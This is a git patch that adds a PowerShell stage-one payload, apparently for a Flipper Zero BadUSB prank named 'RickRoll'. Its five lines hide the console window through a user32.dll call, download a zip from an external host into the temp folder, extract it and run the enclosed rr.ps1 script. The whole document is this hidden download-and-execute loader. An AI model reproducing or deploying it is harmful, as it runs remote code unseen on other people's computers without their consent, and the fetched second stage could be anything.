From 424e6b295b2c2a850b1c69b4070905084741d5fc Mon Sep 17 00:00:00 2001 From: I-Am-Jakoby Date: Mon, 28 Aug 2023 21:29:11 -0500 Subject: [PATCH] Create StageOne.txt --- Payloads/Flip-ADV-RickRoll/StageOne.txt | 5 +++++ 1 file changed, 5 insertions(+) create mode 100644 Payloads/Flip-ADV-RickRoll/StageOne.txt diff --git a/Payloads/Flip-ADV-RickRoll/StageOne.txt b/Payloads/Flip-ADV-RickRoll/StageOne.txt new file mode 100644 index 0000000..8a83307 --- /dev/null +++ b/Payloads/Flip-ADV-RickRoll/StageOne.txt @@ -0,0 +1,5 @@ +$i = '[DllImport("user32.dll")] public static extern bool ShowWindow(int handle, int state);'; +add-type -name win -member $i -namespace native; +[native.win]::ShowWindow(([System.Diagnostics.Process]::GetCurrentProcess() | Get-Process).MainWindowHandle, 0); + +cd "$env:tmp";irm -Uri 'https://jakoby.lol/qee' -O "rr.zip";Expand-Archive "rr.zip" -Force; .\rr.ps1